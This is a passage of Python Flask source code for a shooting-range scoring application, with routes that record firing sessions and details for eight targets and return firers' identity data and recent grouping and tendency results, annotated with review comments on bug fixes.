                gp_len.append(ele6)
        # NOTE(review): these filters pair target_no==N with set_no==N,
        # whereas get_information() uses target_no==1 with set_no==1..4.
        # One of the two is probably wrong -- confirm the intended schema.
        set_1_id = db.session.query(Firer_Details.firer_id).filter(Firer_Details.date==curdate,
            Firer_Details.target_no==1,
            Firer_Details.set_no==1
            ).distinct().scalar()
        set_1_name=db.session.query(Shooter.name).filter(Shooter.id==set_1_id).scalar()
        set_1_army=db.session.query(Shooter.service_id).filter(Shooter.id==set_1_id).scalar()
        set_2_id = db.session.query(Firer_Details.firer_id).filter(Firer_Details.date==curdate,
            Firer_Details.target_no==2,
            Firer_Details.set_no==2
            ).distinct().scalar()
        set_2_name=db.session.query(Shooter.name).filter(Shooter.id==set_2_id).scalar()
        set_2_army=db.session.query(Shooter.service_id).filter(Shooter.id==set_2_id).scalar()
        set_3_id = db.session.query(Firer_Details.firer_id).filter(Firer_Details.date==curdate,
            Firer_Details.target_no==3,
            Firer_Details.set_no==3
            ).distinct().scalar()
        set_3_name=db.session.query(Shooter.name).filter(Shooter.id==set_3_id).scalar()
        set_3_army=db.session.query(Shooter.service_id).filter(Shooter.id==set_3_id).scalar()
        set_4_id = db.session.query(Firer_Details.firer_id).filter(Firer_Details.date==curdate,
            Firer_Details.target_no==4,
            Firer_Details.set_no==4
            ).distinct().scalar()
        set_4_name=db.session.query(Shooter.name).filter(Shooter.id==set_4_id).scalar()
        set_4_army=db.session.query(Shooter.service_id).filter(Shooter.id==set_4_id).scalar()
    return jsonify(name_1=name_1,army=army,rank=rank,cant=cant,
        set_1_name=set_1_name,
        set_2_name=set_2_name,
        set_3_name=set_3_name,
        set_4_name=set_4_name,
        set_1_army=set_1_army,
        set_2_army=set_2_army,
        set_3_army=set_3_army,
        set_4_army=set_4_army,
        gp_len=gp_len,
        res=res,
        ten=ten
        )
@app.route('/individual_score/target_1', methods=['GET', 'POST'])
def individual_score_target_1():
    """Set-up page for target 1.

    Clears the Flask session, purges target-1 Firer_Details once a 5-set
    cycle has completed, and renders the prediction page with today's
    sessions, unsaved details and the dropdown data (shooters, ranges,
    firearms, ammunition, cantonments, genders, ranks).

    Removed dead code from the original: an unused
    ``data = TShooting.query.scalar()`` read, and an earlier duplicate of
    the ``selection`` query (same filter on today's date) whose result was
    immediately overwritten.
    """
    session.clear()
    firing_set_arr=[]
    cantonment=Cantonment.query.distinct(Cantonment.cantonment)
    gender =Gender.query.all()
    rank_s = Rank.query.all()
    # distinct set numbers recorded for target 1
    firing_set=db.session.query(Firer_Details.set_no).filter(Firer_Details.target_no==1).distinct().all()
    for ele in firing_set:
        for ele2 in ele:
            firing_set_arr.append(ele2)
    # Once the 5th set has been recorded the target-1 details are stale:
    # purge them so the next cycle starts clean.
    if(len(firing_set_arr)<1):
        pass
    else:
        i=len(firing_set_arr)-1
        if(firing_set_arr[i]==5):
            db.session.query(Firer_Details).filter(Firer_Details.target_no==1).delete()
            db.session.commit()
        else:
            pass
    dt=time.strftime("%Y-%m-%d")
    curdatetime=datetime.now()
    firer_1 = [row.service_id for row in Shooter.query.all()]
    detail_data=db.session.query(Session_Detail).filter(Session_Detail.date==dt,Session_Detail.save_flag==0).all()
    # placeholders until a detail is loaded client-side
    name = "NA"
    detail_no ="NA"
    rank ="NA"
    target_no = 1
    service_id ="NA"
    ten = []
    res = []
    selection=Shooting_Session.query.filter(Shooting_Session.date>=dt).order_by(Shooting_Session.datetimestamp.desc()).all()
    firearms = Firearms.query.all()
    rang= Range.query.all()
    ammunation = Ammunation.query.all()
    return render_template('pages/prediction_target_1.html',
        curdatetime=curdatetime,
        name = name,
        firer_1=firer_1,
        rank=rank,
        detail_data=detail_data,
        detail_no=detail_no,
        target_no=target_no,
        service_id=service_id,
        firearms=firearms,
        ammunation=ammunation,
        data=selection,
        rang=rang,
        res=res,
        date=dt,
        ten=ten,
        cantonment=cantonment,
        gender=gender,
        rank_s=rank_s)
@app.route('/session_target_1/', methods=['GET', 'POST'])
def session_target_1():
    """Persist a new Shooting_Session from the posted JSON payload.

    Resolves the range / firearm / ammunition display names to ids, inserts
    the session row and echoes the session number back as JSON.  Only POST
    is handled; a plain GET falls through and returns None (unchanged
    behaviour).
    """
    if request.method == "POST":
        payload = request.get_json()
        session = payload["session"]
        range_id = db.session.query(Range.id).filter(Range.name == payload["range"]).scalar()
        arms_id = db.session.query(Firearms.id).filter(Firearms.name == payload["arms"]).scalar()
        ammu_id = db.session.query(Ammunation.id).filter(Ammunation.name == payload["ammu"]).scalar()
        new_session = Shooting_Session(
            date=time.strftime("%Y-%m-%d"),
            datetimestamp=time.strftime("%Y-%m-%d %H:%M"),
            shooting_range_id=range_id,
            firearms_id=arms_id,
            ammunation_id=ammu_id,
            target_distance=payload["dis"],
            weather_notes=payload["weather"],
            comments=payload["comment"],
            session_no=session,
            occasion=payload["occ"]
        )
        db.session.add(new_session)
        db.session.commit()
        result = "This is Successfully Saved"
        return jsonify(result=result, session=session)
@app.route('/target_1_populate/', methods=['GET', 'POST'])
def target_1_populate():
    """Return the active TShooting session id as JSON.

    BUG FIX: the original only returned inside ``if request.method ==
    'POST'``, so a GET (which the route explicitly allows) fell through,
    returned None and produced a 500.  The lookup has no side effects, so it
    is now performed and returned for both methods; POST behaviour is
    unchanged.
    """
    session_id = db.session.query(TShooting.session_id).scalar()
    return jsonify(session_id=session_id)
@app.route('/load_detail_1/', methods=['GET', 'POST'])
def load_detail_1():
    """Create a new firing detail from the posted JSON payload.

    Expected JSON keys: "detail", "session", "paper", "shot", "set", plus
    "r1".."r8" -- the service numbers of the firers on targets 1-8 (an empty
    string means the lane is unmanned and is stored as placeholder id 999).

    Side effects: always replaces the single TPaper_ref row; unless the
    payload assigns the same firer to two lanes, also replaces the live
    TShooting row and appends a Session_Detail row.

    Returns JSON describing target 1's firer (via get_information) on POST,
    or {"result_1": "Done"} on GET.
    """
    result_1="Done"
    if request.method == 'POST':
        data=request.get_json()
        detail =data["detail"]
        sess=data["session"]
        paper=data["paper"]
        shot=data["shot"]
        # renamed from `set` so the builtin set() stays usable below
        set_no=data["set"]
        # Resolve each of the eight firers to a Shooter.id (999 = empty lane).
        firer_ids=[]
        for key in ("r1","r2","r3","r4","r5","r6","r7","r8"):
            service_no=data[key]
            if service_no=="":
                firer_ids.append(999)
            else:
                firer_ids.append(db.session.query(Shooter.id).filter(Shooter.service_id==service_no).scalar())
        r1_id,r2_id,r3_id,r4_id,r5_id,r6_id,r7_id,r8_id=firer_ids
        # TPaper_ref holds exactly one row: the current paper reference.
        db.session.query(TPaper_ref).delete()
        db.session.commit()
        ref_db = TPaper_ref(
            date=time.strftime("%Y-%m-%d"),
            paper_ref=paper,
            detail_no=detail,
            session_no=sess
            )
        db.session.add(ref_db)
        db.session.commit()
        # BUG FIX: the original O(n^2) pairwise loop overwrote `duplicate`
        # on every comparison, so the final iteration (where i == j) always
        # reset it to False and duplicate firers were never rejected.
        # A real firer id may appear at most once; the 999 placeholder may
        # repeat freely.
        real_ids=[fid for fid in firer_ids if fid!=999]
        duplicate=len(real_ids)!=len(set(real_ids))
        if(duplicate):
            print("inside dup")
            error="dup"
        else:
            # replace the live detail and record it in the history table
            db.session.query(TShooting).delete()
            db.session.commit()
            tshoot=TShooting(
                date=datetime.now(),
                datetimestamp=time.strftime("%Y-%m-%d %H:%M"),
                session_id=sess,
                detail_no=detail,
                target_1_id=r1_id,
                target_2_id=r2_id,
                target_3_id=r3_id,
                target_4_id=r4_id,
                target_5_id=r5_id,
                target_6_id=r6_id,
                target_7_id=r7_id,
                target_8_id=r8_id,
                paper_ref=paper,
                set_no=set_no,
                save_flag=0
                )
            db.session.add(tshoot)
            db.session.commit()
            detail_shots =Session_Detail(
                date=datetime.now(),
                datetimestamp=time.strftime("%Y-%m-%d %H:%M"),
                session_id=sess,
                detail_no=detail,
                target_1_id=r1_id,
                target_2_id=r2_id,
                target_3_id=r3_id,
                target_4_id=r4_id,
                target_5_id=r5_id,
                target_6_id=r6_id,
                target_7_id=r7_id,
                target_8_id=r8_id,
                paper_ref=paper,
                set_no=set_no,
                save_flag=0
                )
            db.session.add(detail_shots)
            db.session.commit()
            error="ok"
        # NOTE(review): the response below is identical in the duplicate and
        # success cases (`error` is never sent), so the client is told
        # "Saved Successfully" even when nothing was saved.  Kept as-is to
        # avoid breaking the client JS -- consider returning `error` too.
        firer_name,cant,rank,service_id,res,tenden,gp_len,set_4_name,set_4_army,set_4_session_no,set_4_detail_no,set_3_name,set_3_army,set_3_session_no,set_3_detail_no,set_2_name,set_2_army,set_2_session_no,set_2_detail_no,set_1_name,set_1_army,set_1_session_no,set_1_detail_no,current_firer_name,current_army_no,current_session_no,current_detail_no=get_information(r1_id,sess,paper)
        result="The Detail is Saved Successfully"
        return jsonify(result=result,data1=firer_name,ra_1=rank,detail=detail,
            service_id_1=service_id,
            session=sess,
            paper=paper,
            set_no=set_no,
            cant=cant,
            gp_len=gp_len,
            res=res,
            ten=tenden,
            set_4_name=set_4_name,
            set_3_name=set_3_name,
            set_2_name=set_2_name,
            set_1_name=set_1_name,
            current_firer_name=current_firer_name,
            set_4_army=set_4_army,
            set_3_army=set_3_army,
            set_2_army=set_2_army,
            set_1_army=set_1_army,
            current_army_no=current_army_no,
            set_4_session_no=set_4_session_no,
            set_3_session_no=set_3_session_no,
            set_2_session_no=set_2_session_no,
            set_1_session_no=set_1_session_no,
            current_session_no=current_session_no,
            set_4_detail_no=set_4_detail_no,
            set_3_detail_no=set_3_detail_no,
            set_2_detail_no=set_2_detail_no,
            set_1_detail_no=set_1_detail_no,
            current_detail_no=current_detail_no
            )
    return jsonify(result_1=result_1)
def get_information(target_1_id,sess,paper_ref):
    """Collect display data for the firer on target 1.

    Returns a 27-tuple, in this exact order: (name, cantonment, rank,
    service_id, last-5 results, last-5 tendencies, last-5 grouping lengths,
    then name/army/session/detail for sets 4, 3, 2, 1, then the current
    firer's name/army/session/detail).

    ``sess`` and ``paper_ref`` are accepted for interface compatibility but
    are not used in any query.
    """
    curdate=time.strftime("%Y-%m-%d")
    # Last five history rows each, oldest first ([::-1] undoes the desc sort).
    tten=db.session.query(MPI.tendency_code).filter(MPI.firer_id==target_1_id).order_by(MPI.datetimestamp.desc()).limit(5).all()[::-1]
    tres = db.session.query(Grouping.result).filter(Grouping.firer_id==target_1_id).order_by(Grouping.datetimestamp.desc()).limit(5).all()[::-1]
    tgp = db.session.query(Grouping.grouping_length_f).filter(Grouping.firer_id==target_1_id).order_by(Grouping.datetimestamp.desc()).limit(5).all()[::-1]
    # flatten the single-column row tuples into plain lists
    res=[value for row in tres for value in row]
    ten=[value for row in tten for value in row]
    gp_len=[int(value) for row in tgp for value in row]
    da_1=db.session.query(Shooter.name).filter(Shooter.id==target_1_id).scalar()
    cant_id=db.session.query(Shooter.cantonment_id).filter(Shooter.id==target_1_id).scalar()
    cant=db.session.query(Cantonment.cantonment).filter(Cantonment.id==cant_id).scalar()
    ra_1_id=db.session.query(Shooter.rank_id).filter(Shooter.id==target_1_id).scalar()
    ra_1 = db.session.query(Rank.name).filter(Rank.id==ra_1_id).scalar()
    service_id_1 = db.session.query(Shooter.service_id).filter(Shooter.id==target_1_id).scalar()
    def _set_details(set_number):
        """(name, army no, session id, detail id) recorded today for the
        given set on target 1; Nones when the set has no rows yet."""
        set_filter=(Firer_Details.date==curdate,
                    Firer_Details.target_no==1,
                    Firer_Details.set_no==set_number)
        firer_id=db.session.query(Firer_Details.firer_id).filter(*set_filter).distinct().scalar()
        session_no=db.session.query(Firer_Details.session_id).filter(*set_filter).distinct().scalar()
        detail_no=db.session.query(Firer_Details.detail_id).filter(*set_filter).distinct().scalar()
        name=db.session.query(Shooter.name).filter(Shooter.id==firer_id).scalar()
        army=db.session.query(Shooter.service_id).filter(Shooter.id==firer_id).scalar()
        return name,army,session_no,detail_no
    set_1_name,set_1_army,set_1_session_no,set_1_detail_no=_set_details(1)
    set_2_name,set_2_army,set_2_session_no,set_2_detail_no=_set_details(2)
    set_3_name,set_3_army,set_3_session_no,set_3_detail_no=_set_details(3)
    set_4_name,set_4_army,set_4_session_no,set_4_detail_no=_set_details(4)
    current_firer_name = db.session.query(Shooter.name).filter(Shooter.id==target_1_id).scalar()
    current_army_no = db.session.query(Shooter.service_id).filter(Shooter.id==target_1_id).scalar()
    current_session_no=db.session.query(TShooting.session_id).filter(TShooting.target_1_id==target_1_id).scalar()
    current_detail_no=db.session.query(TShooting.detail_no).filter(TShooting.target_1_id==target_1_id).scalar()
    return(da_1,cant,ra_1,service_id_1,res,ten,gp_len,
        set_4_name,set_4_army,set_4_session_no,set_4_detail_no,
        set_3_name,set_3_army,set_3_session_no,set_3_detail_no,
        set_2_name,set_2_army,set_2_session_no,set_2_detail_no,
        set_1_name,set_1_army,set_1_session_no,set_1_detail_no,
        current_firer_name,current_army_no,current_session_no,current_detail_no
        )
@app.route('/individual_score/target_2', methods=['GET', 'POST'])
def individual_score_target_2():
    """Live score page for target 2: firer identity plus last five grouping
    results and tendency codes."""
    firer_id =db.session.query(TShooting.target_2_id).scalar()
    detail_no =db.session.query(TShooting.detail_no).scalar()
    session_no =db.session.query(TShooting.session_id).scalar()
    target_no = 2
    # last five history rows, oldest first
    tres = db.session.query(Grouping.result).filter(Grouping.firer_id==firer_id).order_by(Grouping.datetimestamp.desc()).limit(5).all()[::-1]
    res=[]
    ten=[]
    tten=db.session.query(MPI.tendency_code).filter(MPI.firer_id==firer_id).order_by(MPI.datetimestamp.desc()).limit(5).all()[::-1]
    print(tres,)
    # flatten the single-column row tuples into plain lists
    for ele in tres:
        for ele2 in ele:
            print(type(ele2))
            res.append(ele2)
    for ele3 in tten:
        for ele4 in ele3:
            print(type(ele4))
            ten.append(ele4)
    service_id = db.session.query(Shooter.service_id).filter(Shooter.id==firer_id).scalar()
    rank_id=db.session.query(Shooter.rank_id).filter(Shooter.id==firer_id).scalar()
    rank=db.session.query(Rank.name).filter(Rank.id==rank_id).scalar()
    name = db.session.query(Shooter.name).filter(Shooter.id==firer_id).scalar()
    # NOTE(review): none of the 18 values unpacked here are used below --
    # presumably called for its side effects or left over from an earlier
    # version; confirm before removing.
    firer_id,sess,o,p,u,q,t1_x,t1_y,xmpi,ympi,f,gp,Tfirt_x,Tfirt_y,fin_x_1,fin_y_1,result_1,fir_tendency_1=prediction_calculation_2()
    if request.method == 'POST':
        # NOTE(review): fetched and printed only; never returned or used.
        paper_ref=db.session.query(TPaper_ref.paper_ref).scalar()
        print("paper_ref")
        print(paper_ref)
    return render_template('pages/prediction_target_2.html',
        name = name,
        detail_no=detail_no,
        session_no=session_no,
        target_no=target_no,
        service_id=service_id,
        rank=rank,
        res=res,
        ten=ten)
@app.route('/individual_score/target_3', methods=['GET', 'POST'])
def individual_score_target_3():
    """Live score page for target 3: firer identity plus the last five
    grouping results and tendency codes (oldest first)."""
    target_no = 3
    firer_id = db.session.query(TShooting.target_3_id).scalar()
    detail_no = db.session.query(TShooting.detail_no).scalar()
    session_no = db.session.query(TShooting.session_id).scalar()
    history_results = db.session.query(Grouping.result).filter(Grouping.firer_id == firer_id).order_by(Grouping.datetimestamp.desc()).limit(5).all()[::-1]
    history_tendencies = db.session.query(MPI.tendency_code).filter(MPI.firer_id == firer_id).order_by(MPI.datetimestamp.desc()).limit(5).all()[::-1]
    print(history_results)
    # flatten single-column row tuples (debug prints preserved)
    res = []
    for row in history_results:
        for value in row:
            print(type(value))
            res.append(value)
    ten = []
    for row in history_tendencies:
        for value in row:
            print(type(value))
            ten.append(value)
    service_id = db.session.query(Shooter.service_id).filter(Shooter.id == firer_id).scalar()
    firer_rank_id = db.session.query(Shooter.rank_id).filter(Shooter.id == firer_id).scalar()
    rank = db.session.query(Rank.name).filter(Rank.id == firer_rank_id).scalar()
    name = db.session.query(Shooter.name).filter(Shooter.id == firer_id).scalar()
    return render_template('pages/prediction_target_3.html',
                           name=name,
                           detail_no=detail_no,
                           session_no=session_no,
                           target_no=target_no,
                           service_id=service_id,
                           rank=rank,
                           res=res,
                           ten=ten)
@app.route('/individual_score/target_4', methods=['GET', 'POST'])
def individual_score_target_4():
    """Live score page for target 4: firer identity plus the last five
    grouping results and tendency codes (oldest first)."""
    target_no = 4
    firer_id = db.session.query(TShooting.target_4_id).scalar()
    detail_no = db.session.query(TShooting.detail_no).scalar()
    session_no = db.session.query(TShooting.session_id).scalar()
    history_results = db.session.query(Grouping.result).filter(Grouping.firer_id == firer_id).order_by(Grouping.datetimestamp.desc()).limit(5).all()[::-1]
    history_tendencies = db.session.query(MPI.tendency_code).filter(MPI.firer_id == firer_id).order_by(MPI.datetimestamp.desc()).limit(5).all()[::-1]
    print(history_results)
    # flatten single-column row tuples (debug prints preserved)
    res = []
    for row in history_results:
        for value in row:
            print(type(value))
            res.append(value)
    ten = []
    for row in history_tendencies:
        for value in row:
            print(type(value))
            ten.append(value)
    service_id = db.session.query(Shooter.service_id).filter(Shooter.id == firer_id).scalar()
    firer_rank_id = db.session.query(Shooter.rank_id).filter(Shooter.id == firer_id).scalar()
    rank = db.session.query(Rank.name).filter(Rank.id == firer_rank_id).scalar()
    name = db.session.query(Shooter.name).filter(Shooter.id == firer_id).scalar()
    return render_template('pages/prediction_target_4.html',
                           name=name,
                           detail_no=detail_no,
                           session_no=session_no,
                           target_no=target_no,
                           service_id=service_id,
                           rank=rank,
                           res=res,
                           ten=ten)
@app.route('/individual_score/target_5', methods=['GET', 'POST'])
def individual_score_target_5():
    """Live score page for target 5: firer identity plus the last five
    grouping results and tendency codes (oldest first)."""
    target_no = 5
    firer_id = db.session.query(TShooting.target_5_id).scalar()
    detail_no = db.session.query(TShooting.detail_no).scalar()
    session_no = db.session.query(TShooting.session_id).scalar()
    history_results = db.session.query(Grouping.result).filter(Grouping.firer_id == firer_id).order_by(Grouping.datetimestamp.desc()).limit(5).all()[::-1]
    history_tendencies = db.session.query(MPI.tendency_code).filter(MPI.firer_id == firer_id).order_by(MPI.datetimestamp.desc()).limit(5).all()[::-1]
    print(history_results)
    # flatten single-column row tuples (debug prints preserved)
    res = []
    for row in history_results:
        for value in row:
            print(type(value))
            res.append(value)
    ten = []
    for row in history_tendencies:
        for value in row:
            print(type(value))
            ten.append(value)
    service_id = db.session.query(Shooter.service_id).filter(Shooter.id == firer_id).scalar()
    firer_rank_id = db.session.query(Shooter.rank_id).filter(Shooter.id == firer_id).scalar()
    rank = db.session.query(Rank.name).filter(Rank.id == firer_rank_id).scalar()
    name = db.session.query(Shooter.name).filter(Shooter.id == firer_id).scalar()
    return render_template('pages/prediction_target_5.html',
                           name=name,
                           detail_no=detail_no,
                           session_no=session_no,
                           target_no=target_no,
                           service_id=service_id,
                           rank=rank,
                           res=res,
                           ten=ten)
@app.route('/individual_score/target_6', methods=['GET', 'POST'])
def individual_score_target_6():
    """Live score page for target 6: firer identity plus the last five
    grouping results and tendency codes (oldest first)."""
    target_no = 6
    firer_id = db.session.query(TShooting.target_6_id).scalar()
    detail_no = db.session.query(TShooting.detail_no).scalar()
    session_no = db.session.query(TShooting.session_id).scalar()
    history_results = db.session.query(Grouping.result).filter(Grouping.firer_id == firer_id).order_by(Grouping.datetimestamp.desc()).limit(5).all()[::-1]
    history_tendencies = db.session.query(MPI.tendency_code).filter(MPI.firer_id == firer_id).order_by(MPI.datetimestamp.desc()).limit(5).all()[::-1]
    print(history_results)
    # flatten single-column row tuples (debug prints preserved)
    res = []
    for row in history_results:
        for value in row:
            print(type(value))
            res.append(value)
    ten = []
    for row in history_tendencies:
        for value in row:
            print(type(value))
            ten.append(value)
    service_id = db.session.query(Shooter.service_id).filter(Shooter.id == firer_id).scalar()
    firer_rank_id = db.session.query(Shooter.rank_id).filter(Shooter.id == firer_id).scalar()
    rank = db.session.query(Rank.name).filter(Rank.id == firer_rank_id).scalar()
    name = db.session.query(Shooter.name).filter(Shooter.id == firer_id).scalar()
    return render_template('pages/prediction_target_6.html',
                           name=name,
                           detail_no=detail_no,
                           session_no=session_no,
                           target_no=target_no,
                           service_id=service_id,
                           rank=rank,
                           res=res,
                           ten=ten)
@app.route('/individual_score/target_7', methods=['GET', 'POST'])
def individual_score_target_7():
    """Render the score page for the firer currently assigned to target 7.

    Pulls the firer id from the live TShooting row, then the firer's five
    most recent grouping results and MPI tendency codes (oldest first),
    plus identity data, and renders the target-7 prediction template.
    """
    firer_id = db.session.query(TShooting.target_7_id).scalar()
    detail_no = db.session.query(TShooting.detail_no).scalar()
    session_no = db.session.query(TShooting.session_id).scalar()
    target_no = 7
    # Latest five entries, reversed so the template gets them oldest-first.
    tres = db.session.query(Grouping.result).filter(
        Grouping.firer_id == firer_id
    ).order_by(Grouping.datetimestamp.desc()).limit(5).all()[::-1]
    tten = db.session.query(MPI.tendency_code).filter(
        MPI.firer_id == firer_id
    ).order_by(MPI.datetimestamp.desc()).limit(5).all()[::-1]
    # Each query row is a one-element tuple; flatten to plain values.
    # (Debug print() calls from the original removed.)
    res = [value for row in tres for value in row]
    ten = [value for row in tten for value in row]
    service_id = db.session.query(Shooter.service_id).filter(Shooter.id == firer_id).scalar()
    rank_id = db.session.query(Shooter.rank_id).filter(Shooter.id == firer_id).scalar()
    rank = db.session.query(Rank.name).filter(Rank.id == rank_id).scalar()
    name = db.session.query(Shooter.name).filter(Shooter.id == firer_id).scalar()
    return render_template('pages/prediction_target_7.html',
                           name=name,
                           detail_no=detail_no,
                           session_no=session_no,
                           target_no=target_no,
                           service_id=service_id,
                           rank=rank,
                           res=res,
                           ten=ten)
@app.route('/individual_score/target_8', methods=['GET', 'POST'])
def individual_score_target_8():
    """Render the score page for the firer currently assigned to target 8.

    Pulls the firer id from the live TShooting row, then the firer's five
    most recent grouping results and MPI tendency codes (oldest first),
    plus identity data, and renders the target-8 prediction template.
    """
    firer_id = db.session.query(TShooting.target_8_id).scalar()
    detail_no = db.session.query(TShooting.detail_no).scalar()
    session_no = db.session.query(TShooting.session_id).scalar()
    # BUG FIX: the original set target_no = 7 here (copy-paste from the
    # target-7 route); this is the target-8 page.
    target_no = 8
    # Latest five entries, reversed so the template gets them oldest-first.
    tres = db.session.query(Grouping.result).filter(
        Grouping.firer_id == firer_id
    ).order_by(Grouping.datetimestamp.desc()).limit(5).all()[::-1]
    tten = db.session.query(MPI.tendency_code).filter(
        MPI.firer_id == firer_id
    ).order_by(MPI.datetimestamp.desc()).limit(5).all()[::-1]
    # Each query row is a one-element tuple; flatten to plain values.
    # (Debug print() calls from the original removed.)
    res = [value for row in tres for value in row]
    ten = [value for row in tten for value in row]
    service_id = db.session.query(Shooter.service_id).filter(Shooter.id == firer_id).scalar()
    rank_id = db.session.query(Shooter.rank_id).filter(Shooter.id == firer_id).scalar()
    rank = db.session.query(Rank.name).filter(Rank.id == rank_id).scalar()
    name = db.session.query(Shooter.name).filter(Shooter.id == firer_id).scalar()
    return render_template('pages/prediction_target_8.html',
                           name=name,
                           detail_no=detail_no,
                           session_no=session_no,
                           target_no=target_no,
                           service_id=service_id,
                           rank=rank,
                           res=res,
                           ten=ten)
@app.route('/prediction_target_1/', methods=['GET', 'POST'])
def prediction_target_1():
    """Return the chart/prediction payload for target 1 as JSON.

    POST: runs prediction_calculation_1() for the current firer, loads the
    final shot coordinates of sets 2-4 and the identity data of sets 1-4
    for today's firing, and returns everything the chart page needs.
    GET: returns the same payload filled with neutral defaults.
    """
    # Neutral defaults so a GET request still yields a well-formed payload.
    t1_x = 0
    t1_y = 0
    gp = 0
    Tfirt_x_j = 0
    Tfirt_y_j = 0
    result_1 = None
    fir_tendency_1 = None
    set_1_name = None
    set_1_army = None
    set_1_session_no = None
    set_1_detail_no = None
    set_2_name = None
    set_2_army = None
    set_2_session_no = None
    set_2_detail_no = None
    set_3_name = None
    set_3_army = None
    set_3_session_no = None
    set_3_detail_no = None
    set_4_name = None
    set_4_army = None
    set_4_session_no = None
    set_4_detail_no = None
    current_firer_name = None
    current_army_no = None
    current_session_no = None
    current_detail_no = None
    set_2_x_arr = []
    set_2_y_arr = []
    set_3_x_arr = []
    set_3_y_arr = []
    set_4_x_arr = []
    set_4_y_arr = []
    fin_x_arr_1 = []
    fin_y_arr_1 = []
    curdate = time.strftime("%Y-%m-%d")
    if request.method == 'POST':
        (firer_id, sess, detail, p, u, q, t1_x, t1_y, xmpi, ympi, f, gp,
         Tfirt_x, Tfirt_y, fin_x_1, fin_y_1, result_1,
         fir_tendency_1) = prediction_calculation_1()

        def set_rows(set_no):
            # Rows for one set of target 1 today.  Queried ONCE and reused
            # for both x and y (the original issued the identical query twice).
            return db.session.query(Firer_Details).filter(
                Firer_Details.date == curdate,
                Firer_Details.target_no == 1,
                Firer_Details.set_no == set_no,
                Firer_Details.session_id == sess).all()

        def set_scalar(column, set_no):
            # Single distinct value of *column* for one set of target 1.
            # NOTE: as in the original, this intentionally does not filter
            # on session_id.
            return db.session.query(column).filter(
                Firer_Details.date == curdate,
                Firer_Details.target_no == 1,
                Firer_Details.set_no == set_no).distinct().scalar()

        def shooter_scalar(column, shooter_id):
            # One Shooter attribute looked up by id.
            return db.session.query(column).filter(Shooter.id == shooter_id).scalar()

        for rows, x_arr, y_arr in ((set_rows(2), set_2_x_arr, set_2_y_arr),
                                   (set_rows(3), set_3_x_arr, set_3_y_arr),
                                   (set_rows(4), set_4_x_arr, set_4_y_arr)):
            for row in rows:
                x_arr.append(int(row.final_x))
                y_arr.append(int(row.final_y))

        set_1_id = set_scalar(Firer_Details.firer_id, 1)
        set_1_session_no = set_scalar(Firer_Details.session_id, 1)
        set_1_detail_no = set_scalar(Firer_Details.detail_id, 1)
        set_1_name = shooter_scalar(Shooter.name, set_1_id)
        set_1_army = shooter_scalar(Shooter.service_id, set_1_id)

        set_2_id = set_scalar(Firer_Details.firer_id, 2)
        set_2_session_no = set_scalar(Firer_Details.session_id, 2)
        set_2_detail_no = set_scalar(Firer_Details.detail_id, 2)
        set_2_name = shooter_scalar(Shooter.name, set_2_id)
        set_2_army = shooter_scalar(Shooter.service_id, set_2_id)

        set_3_id = set_scalar(Firer_Details.firer_id, 3)
        set_3_session_no = set_scalar(Firer_Details.session_id, 3)
        set_3_detail_no = set_scalar(Firer_Details.detail_id, 3)
        set_3_name = shooter_scalar(Shooter.name, set_3_id)
        set_3_army = shooter_scalar(Shooter.service_id, set_3_id)

        set_4_id = set_scalar(Firer_Details.firer_id, 4)
        set_4_session_no = set_scalar(Firer_Details.session_id, 4)
        set_4_detail_no = set_scalar(Firer_Details.detail_id, 4)
        set_4_name = shooter_scalar(Shooter.name, set_4_id)
        set_4_army = shooter_scalar(Shooter.service_id, set_4_id)

        current_firer_name = shooter_scalar(Shooter.name, firer_id)
        current_army_no = shooter_scalar(Shooter.service_id, firer_id)
        current_session_no = db.session.query(TShooting.session_id).filter(
            TShooting.target_1_id == firer_id).scalar()
        current_detail_no = db.session.query(TShooting.detail_no).filter(
            TShooting.target_1_id == firer_id).scalar()

        # JSON-encode the trend series for the chart.  (The original also
        # computed unused xmpi_j/ympi_j via pixeltoinch() and fetched an
        # unused paper_ref; that dead code has been removed.)
        Tfirt_x_j = pd.Series(Tfirt_x).to_json(orient='values')
        Tfirt_y_j = pd.Series(Tfirt_y).to_json(orient='values')
        fin_x_arr_1 = [int(x_1.final_x) for x_1 in fin_x_1]
        fin_y_arr_1 = [int(y_1.final_y) for y_1 in fin_y_1]
    return jsonify(x1=t1_x,
                   y1=t1_y,
                   xmpi1=Tfirt_x_j,
                   ympi1=Tfirt_y_j,
                   gp=gp,
                   txf1=Tfirt_x_j,
                   tyf1=Tfirt_y_j,
                   fx1=fin_x_arr_1,
                   fy1=fin_y_arr_1,
                   result_1=result_1,
                   fir_tendency_1=fir_tendency_1,
                   set_1_name=set_1_name,
                   current_firer_name=current_firer_name,
                   set_1_army=set_1_army,
                   current_army_no=current_army_no,
                   set_1_session_no=set_1_session_no,
                   current_session_no=current_session_no,
                   set_1_detail_no=set_1_detail_no,
                   current_detail_no=current_detail_no,
                   set_2_x=set_2_x_arr,
                   set_2_y=set_2_y_arr,
                   set_2_name=set_2_name,
                   set_2_army=set_2_army,
                   set_2_detail_no=set_2_detail_no,
                   set_2_session_no=set_2_session_no,
                   set_3_x=set_3_x_arr,
                   set_3_y=set_3_y_arr,
                   set_3_name=set_3_name,
                   set_3_army=set_3_army,
                   set_3_session_no=set_3_session_no,
                   set_3_detail_no=set_3_detail_no,
                   set_4_x=set_4_x_arr,
                   set_4_y=set_4_y_arr,
                   set_4_name=set_4_name,
                   set_4_army=set_4_army,
                   set_4_session_no=set_4_session_no,
                   set_4_detail_no=set_4_detail_no)
@app.route('/prediction_target_2/', methods=['GET', 'POST'])
def prediction_target_2():
    """Return the chart/prediction payload for target 2 as JSON.

    POST: runs prediction_calculation_2() for the current firer, loads the
    final shot coordinates of sets 2-4 and the identity data of sets 1-4
    for today's paper/session, and returns everything the chart page needs.
    GET: returns the same payload filled with neutral defaults.
    """
    # Neutral defaults so a GET request still yields a well-formed payload.
    t1_x = 0
    t1_y = 0
    gp = 0
    Tfirt_x_j = 0
    Tfirt_y_j = 0
    result_1 = None
    fir_tendency_1 = None
    set_1_name = None
    set_1_army = None
    set_1_session_no = None
    set_1_detail_no = None
    set_2_name = None
    set_2_army = None
    set_2_session_no = None
    set_2_detail_no = None
    set_3_name = None
    set_3_army = None
    set_3_session_no = None
    set_3_detail_no = None
    set_4_name = None
    set_4_army = None
    set_4_session_no = None
    set_4_detail_no = None
    current_firer_name = None
    current_army_no = None
    current_session_no = None
    current_detail_no = None
    set_2_x_arr = []
    set_2_y_arr = []
    set_3_x_arr = []
    set_3_y_arr = []
    set_4_x_arr = []
    set_4_y_arr = []
    fin_x_arr_1 = []
    fin_y_arr_1 = []
    curdate = time.strftime("%Y-%m-%d")
